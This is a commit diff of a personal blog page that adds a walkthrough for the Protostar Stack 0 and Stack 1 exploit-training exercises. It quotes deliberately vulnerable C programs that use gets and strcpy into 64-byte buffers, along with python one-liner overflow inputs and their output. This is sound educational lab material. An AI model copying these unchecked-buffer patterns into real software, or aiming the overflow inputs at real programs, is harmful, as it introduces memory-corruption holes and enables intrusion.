new site4
This commit is contained in:
@@ -5,11 +5,16 @@
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<script type="text/javascript">
|
||||
var host = "paul.walko.org";
|
||||
if ((host == window.location.host) && (window.location.protocol != "https:"))
|
||||
window.location.protocol = "https";
|
||||
</script>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
|
||||
|
||||
<title>Protostar Exploit Exercises Solutions 0-3</title>
|
||||
<title>Protostar Exploit Exercises Solutions 0-1</title>
|
||||
|
||||
<!-- favicon -->
|
||||
<link rel="apple-touch-icon" sizes="57x57" href="http://paul.walko.org/favicon/apple-icon-57x57.png">
|
||||
@@ -35,6 +40,10 @@
|
||||
|
||||
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
|
||||
|
||||
|
||||
|
||||
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
|
||||
|
||||
<!--[if lt IE 9]>
|
||||
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
|
||||
<![endif]-->
|
||||
@@ -85,7 +94,7 @@
|
||||
$('#dummySearch').submit(function(e) {
|
||||
e.preventDefault();
|
||||
keyword = $('#search').val();
|
||||
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
|
||||
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
|
||||
location.href = url;
|
||||
})
|
||||
})
|
||||
@@ -100,7 +109,7 @@
|
||||
<div class="row">
|
||||
<div id="markdown-container" class="col-lg-9">
|
||||
<header>
|
||||
<p id="postTitle">Protostar Exploit Exercises Solutions 0-3</p>
|
||||
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
|
||||
|
||||
<ul class="tags clearfix">
|
||||
|
||||
@@ -116,7 +125,95 @@
|
||||
|
||||
</header>
|
||||
|
||||
|
||||
<h1 id="stack-0">Stack 0</h1>
|
||||
|
||||
<p>Here’s what we’re given:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
volatile int modified;
|
||||
char buffer[64];
|
||||
|
||||
modified = 0;
|
||||
gets(buffer);
|
||||
|
||||
if(modified != 0) {
|
||||
printf("you have changed the 'modified' variable\n");
|
||||
} else {
|
||||
printf("Try again?\n");
|
||||
}
|
||||
}
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
|
||||
I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
|
||||
Try again?
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>That works as expected, now with 65 bytes:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
|
||||
you have changed the 'modified' variable
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>Solved!</p>
|
||||
|
||||
<h1 id="stack-1">Stack 1</h1>
|
||||
|
||||
<p>Here’s the code we’re given:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
volatile int modified;
|
||||
char buffer[64];
|
||||
|
||||
if(argc == 1) {
|
||||
errx(1, "please specify an argument\n");
|
||||
}
|
||||
|
||||
modified = 0;
|
||||
strcpy(buffer, argv[1]);
|
||||
|
||||
if(modified == 0x61626364) {
|
||||
printf("you have correctly got the variable to the right value\n");
|
||||
} else {
|
||||
printf("Try again, you got 0x%08x\n", modified);
|
||||
}
|
||||
}
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>Just like Stack 0, we’re given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
|
||||
|
||||
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so I’ll input the value in reverse order:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
|
||||
Try again, you got 0x00000000
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>That works as expected, now with the additional bytes:</p>
|
||||
|
||||
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
|
||||
you have correctly got the variable to the right value
|
||||
</code></pre>
|
||||
</div>
|
||||
|
||||
<p>Woo!</p>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
Reference in New Issue
Block a user